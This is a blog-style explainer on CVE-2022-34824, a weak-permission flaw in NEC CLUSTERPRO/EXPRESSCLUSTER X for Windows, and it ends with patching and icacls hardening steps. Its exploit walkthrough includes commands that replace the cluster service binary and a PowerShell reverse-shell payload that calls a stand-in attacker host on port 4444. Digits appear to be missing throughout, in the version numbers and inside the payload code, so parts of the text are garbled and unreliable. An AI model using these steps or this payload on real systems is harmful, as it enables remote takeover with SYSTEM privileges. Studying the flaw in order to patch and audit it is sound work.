Security flaws can often hide in plain sight. One such overlooked risk is improper file and folder permissions. CVE-2022-34824 is a textbook example—if you're running CLUSTERPRO X 5. or EXPRESSCLUSTER X 5. (even SingleServerSafe editions!) for Windows, you might be letting hackers right into your system. Let's break down what happened, see a peek at possible exploits, and learn how to keep your systems safe.

EXPRESSCLUSTER X 5. SingleServerSafe for Windows _and earlier_

Vendor: NEC (Nippon Electric Company)  
Official advisory link

Short story: These products use weak permissions on some folders and files. Remote, unauthenticated attackers can overwrite files—and that means potentially running whatever code they like, disguised as trusted programs.

How Does This Happen?

A lot of applications install with full write permissions (like Everyone: Full Control) on their folders or log files. Normally, only admins should be able to change important files. But with weak permissions, any local or even remote user can mess with them.

Suppose the application runs as SYSTEM (which is super powerful!). If an attacker can swap out a .exe, .dll, or even a config file with their own code, the app will run their code as SYSTEM next time it's started.

Exploit Walkthrough

Here’s a simplified walkthrough of how someone might take advantage. This example assumes the vulnerable folder is world-writable and the CLUSTERPRO/EXPRESSCLUSTER service runs as SYSTEM.

First, find an application folder with poor permissions. You can check permissions in the terminal

icacls "C:\Program Files\CLUSTERPRO\bin"

If you see something like

Everyone:(OI)(CI)(F)

It means everyone can read, write, and modify everything inside.

Step 2: Drop a Malicious File

Suppose there’s an executable svc.exe that runs as part of the cluster service.

You could create your own malicious payload (e.g., attack.exe), and replace the legitimate file

copy attack.exe "C:\Program Files\CLUSTERPRO\bin\svc.exe" /Y

Step 3: Wait for Execution

Restart the affected cluster service or system. When the service runs svc.exe (now your malware), it executes with SYSTEM privileges.

Weaponized Example

Here’s a (simplified) code snippet that demonstrates planting a reverse-shell payload as a replacement:

# attacker-prepped PowerShell payload for reverse shell
$code = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient(\'attacker_ip\',4444);$stream = $client.GetStream();[byte[]]$bytes = ..65535|%{};while(($i = $stream.Read($bytes, , $bytes.Length)) -ne ){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \'PS \' + (pwd).Path + \'> \';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,,$sendbyte.Length);$stream.Flush()};$client.Close()"'

# build malicious executable that runs this payload (use msbuild, msfvenom, or a code editor)
# save as attack.exe

# now replace the legitimate binary
Copy-Item -Path "attack.exe" -Destination "C:\Program Files\CLUSTERPRO\bin\svc.exe" -Force

Why Is This So Bad?

Remote, unauthenticated attacker  
If the weak directory is shared or exposed to the network, a remote attacker who isn't even logged in can overwrite critical files.

Privilege escalation  
If the cluster service runs as SYSTEM (many cluster managers do), the attacker can gain the highest privileges on the system.

Lateral movement  
Attackers could use the compromised system to move throughout your network.

Official References

- JVN#38853430: CLUSTERPRO/EXPRESSCLUSTER X Insufficient Access Control Vulnerabilities
- NEC ExpressCluster vulnerability info (same as above)
- CVE Details for CVE-2022-34824

Mitigation & Fix

Patches:  
Check for official updates or hotfixes from NEC and apply them immediately.

Manual Fix:

Example

icacls "C:\Program Files\CLUSTERPRO" /inheritance:r /grant:r "Administrators:F" /grant:r "SYSTEM:F" /remove "Everyone"

Audit:
Regularly run permission audits on all server application folders!

Conclusion

CVE-2022-34824 proves how a simple misconfiguration can hand over the keys to your kingdom. Always lock down your app folders, especially if they contain executables or configuration files. Patching and good permission hygiene are your best friends.

If you use CLUSTERPRO X, EXPRESSCLUSTER X, or SingleServerSafe on Windows—patch now and check those folder permissions!


_Curious to learn more or share a story? Contact NEC support page or follow security updates at your vendor’s site._

Timeline

Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:30:00 UTC